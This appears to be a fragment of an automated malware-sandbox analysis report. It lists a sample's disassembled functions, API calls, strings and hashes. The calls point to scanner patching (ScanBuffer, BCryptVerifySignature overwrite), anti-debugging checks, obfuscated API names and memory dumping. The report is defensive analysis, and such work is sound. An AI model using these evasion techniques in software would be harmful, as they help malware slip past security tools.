                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                        • API String ID: 2852987580-51457883
                                                                                        • Opcode ID: 28a0bedc08dccbced71c839fff1e0508311ac76d2050338cd47246e38124c94f
                                                                                        • Instruction ID: 1312af9b2698ad8161b6048d725db8b9b4ac71924c21cdcbd83a423c78213167
                                                                                        • Opcode Fuzzy Hash: 28a0bedc08dccbced71c839fff1e0508311ac76d2050338cd47246e38124c94f
                                                                                        • Instruction Fuzzy Hash: 5FE22679A4015A9FDF12EB54DDA6BCE73B6EF89300F1041B19006AB214DF34AE95CF61
                                                                                        Function 027D5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 10910 27d5acc-27d5b0d GetModuleFileNameA RegOpenKeyExA 10911 27d5b4f-27d5b92 call 27d5908 RegQueryValueExA 10910->10911 10912 27d5b0f-27d5b2b RegOpenKeyExA 10910->10912 10917 27d5b94-27d5bb0 RegQueryValueExA 10911->10917 10918 27d5bb6-27d5bd0 RegCloseKey 10911->10918 10912->10911 10913 27d5b2d-27d5b49 RegOpenKeyExA 10912->10913 10913->10911 10915 27d5bd8-27d5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10913->10915 10919 27d5c0f-27d5c13 10915->10919 10920 27d5cf2-27d5cf9 10915->10920 10917->10918 10923 27d5bb2 10917->10923 10921 27d5c1f-27d5c35 lstrlenA 10919->10921 10922 27d5c15-27d5c19 10919->10922 10925 27d5c38-27d5c3b 10921->10925 10922->10920 10922->10921 10923->10918 10926 27d5c3d-27d5c45 10925->10926 10927 27d5c47-27d5c4f 10925->10927 10926->10927 10928 27d5c37 10926->10928 10927->10920 10929 27d5c55-27d5c5a 10927->10929 10928->10925 10930 27d5c5c-27d5c82 lstrcpynA LoadLibraryExA 10929->10930 10931 27d5c84-27d5c86 10929->10931 10930->10931 10931->10920 10932 27d5c88-27d5c8c 10931->10932 10932->10920 10933 27d5c8e-27d5cbe lstrcpynA LoadLibraryExA 10932->10933 10933->10920 10934 27d5cc0-27d5cf0 lstrcpynA LoadLibraryExA 10933->10934 10934->10920
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,027D0000,027FE790), ref: 027D5AE8
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B06
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027D0000,027FE790), ref: 027D5B24
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D5B42
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D5B8B
                                                                                        • RegQueryValueExA.ADVAPI32(?,027D5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5BD1,?,80000001), ref: 027D5BA9
                                                                                        • RegCloseKey.ADVAPI32(?,027D5BD8,00000000,?,?,00000000,027D5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D5BCB
                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5BE8
                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5BF5
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D5BFB
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D5C26
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5C6D
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5C7D
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5CA5
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5CB5
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D5CDB
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027D5CEB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                        • API String ID: 1759228003-2375825460
                                                                                        • Opcode ID: c15b65bbb57e2048f6aac8f9631125bf8ec6fbfcbed6e6023d86286100594794
                                                                                        • Instruction ID: c3e34a489db54c63baf7ecf738aacb9ebbe7e4affb00c43f8dd7247ee2ff1574
                                                                                        • Opcode Fuzzy Hash: c15b65bbb57e2048f6aac8f9631125bf8ec6fbfcbed6e6023d86286100594794
                                                                                        • Instruction Fuzzy Hash: CF519871B4025D7FFB21D6E4CC4AFEF7BBD9B04744F8405A5AA08E6181EB74AA448F60
                                                                                        Function 027E8818 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 13166 27e8818-27e883d LoadLibraryW 13167 27e883f-27e8857 GetProcAddress 13166->13167 13168 27e8887-27e888d 13166->13168 13169 27e887c-27e8882 FreeLibrary 13167->13169 13170 27e8859-27e8878 call 27e7d78 13167->13170 13169->13168 13170->13169 13173 27e887a 13170->13173 13173->13169
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                        • API String ID: 1002360270-4067648912
                                                                                        • Opcode ID: e9ea02c49ae79e6b2992b1c7d5c55d7c71101612f354684ff2446c09383ec4f6
                                                                                        • Instruction ID: 54ab804027e6dde41dc6509da60e52d95f769a0d406903936d146255e1549cc3
                                                                                        • Opcode Fuzzy Hash: e9ea02c49ae79e6b2992b1c7d5c55d7c71101612f354684ff2446c09383ec4f6
                                                                                        • Instruction Fuzzy Hash: CFF02278E83B045EE730A668BA4DF2633ECE34831CF0D492AB008C72C0C3715868CB20
                                                                                        Function 027EFA38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 13183 27efa38-27efa52 GetModuleHandleW 13184 27efa7e-27efa86 13183->13184 13185 27efa54-27efa66 GetProcAddress 13183->13185 13185->13184 13186 27efa68-27efa78 CheckRemoteDebuggerPresent 13185->13186 13186->13184 13187 27efa7a 13186->13187 13187->13184
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 027EFA48
                                                                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027EFA5A
                                                                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027EFA71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                        • API String ID: 35162468-539270669
                                                                                        • Opcode ID: 6e73c6a7356adabe1b05a47272d314494303615280b6980f8aeb5b3a3e913383
                                                                                        • Instruction ID: f502e16f56deb7b1708dcc704458b4d7919f871a7f4bf0ed3aea86abe9b94101
                                                                                        • Opcode Fuzzy Hash: 6e73c6a7356adabe1b05a47272d314494303615280b6980f8aeb5b3a3e913383
                                                                                        • Instruction Fuzzy Hash: 4FF0A770904248AADF11A6F8C88CB9CFBB95B0A328F2403D1D4266A9E1E7711644C6AA
                                                                                        Function 027EE064 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 027D4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 027D4F2E
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE09F
                                                                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE0CF
                                                                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027EE0E4
                                                                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027EE110
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027EE119
                                                                                          • Part of subcall function 027D4C60: SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 1897104825-0
                                                                                        • Opcode ID: c9f02ad11066dca1ca7883b16efee9dd6844e816fc62fd9c7e9ad4cb14b9efd3
                                                                                        • Instruction ID: 15349d44fa63ee430261b5859b0d74645901ad0ee560e901ba101f2844e6d1a5
                                                                                        • Opcode Fuzzy Hash: c9f02ad11066dca1ca7883b16efee9dd6844e816fc62fd9c7e9ad4cb14b9efd3
                                                                                        • Instruction Fuzzy Hash: 9821D371A40308BBEB11EAE4CC56FDE77BDEB48700F510461F601F71D0DA74AA448B65
                                                                                        Function 027EE7AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027EE8EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CheckConnectionInternet
                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                        • API String ID: 3847983778-3852638603
                                                                                        • Opcode ID: aeb2b10d1a7a94b2d85ea304b88195d8e0f12451ffec76df6f4ba717de231d6b
                                                                                        • Instruction ID: 7501c609f0c005200415d19c0c11af21389de49fab16e30db7648db2542d3896
                                                                                        • Opcode Fuzzy Hash: aeb2b10d1a7a94b2d85ea304b88195d8e0f12451ffec76df6f4ba717de231d6b
                                                                                        • Instruction Fuzzy Hash: 0B414E75F102499BEF02EBA4D895ADEB7FAEF9C710F604831E042A7250DA70AD018F61
                                                                                        Function 027EDF80 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027D4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 027D4F2E
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE052), ref: 027EDFBF
                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027EDFF9
                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027EE026
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027EE02F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3764614163-0
                                                                                        • Opcode ID: a9fbb95e86c329e08604a17b7ffdb07f6b97c2a03a5cc7b26cbc4b1fb362d745
                                                                                        • Instruction ID: 0062d2f6150ccd3f3326e29fb5bfef8bba4f686b4ff5acf5c4cfcc379a9e9d65
                                                                                        • Opcode Fuzzy Hash: a9fbb95e86c329e08604a17b7ffdb07f6b97c2a03a5cc7b26cbc4b1fb362d745
                                                                                        • Instruction Fuzzy Hash: 0921F171A40248BAEF21EBA4CD56F9E77BDEB08B00F614461B601F71D0D7B46E048B65
                                                                                        Function 027E8654 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                                        • API String ID: 3130163322-2353454454
                                                                                        • Opcode ID: 126979a35ec61358ed0ee4449c57685d8fbb724a7b9f364e8cb7e7b790897144
                                                                                        • Instruction ID: f654ab361b02969438039ce0dc079ec3956848ab5323b0bbd4a7d0453bc4aa56
                                                                                        • Opcode Fuzzy Hash: 126979a35ec61358ed0ee4449c57685d8fbb724a7b9f364e8cb7e7b790897144
                                                                                        • Instruction Fuzzy Hash: 481112B6640208BFEB81EFA8DE46F9A37EDEB0C714F464420BA09D3650C630ED108B75
                                                                                        Function 027E7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                        • API String ID: 4072585319-445027087
                                                                                        • Opcode ID: 4aa6e6e9700a1fb5ae6fc02a2ea1ad8e175e43bbebe4026d7624ebc037995988
                                                                                        • Instruction ID: f7a02cf9f48bf1b1ae5d8c47931ddaa642e4909edd183d054d39e01bf93484e1
                                                                                        • Opcode Fuzzy Hash: 4aa6e6e9700a1fb5ae6fc02a2ea1ad8e175e43bbebe4026d7624ebc037995988
                                                                                        • Instruction Fuzzy Hash: 40116D79600208BFEB15DFA8DD59FAEB7FDEB4C710F458464B901D7240DA30AA148B75
                                                                                        Function 027E7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                        • API String ID: 4072585319-445027087
                                                                                        • Opcode ID: 4c60b699f862d9cc2561943658b149fa00e4ab2f2aecb5da56dc03f3848a8d46
                                                                                        • Instruction ID: 41dd084b77a26abc34124811db2759b9aa9520e85d45a835aa8bc7abe33a965f
                                                                                        • Opcode Fuzzy Hash: 4c60b699f862d9cc2561943658b149fa00e4ab2f2aecb5da56dc03f3848a8d46
                                                                                        • Instruction Fuzzy Hash: 64116D79600208BFEB15DFA8DD59F9EB7FDEB4C710F458464B901D7240DA30AA148B75
                                                                                        Function 027E82CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E833D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
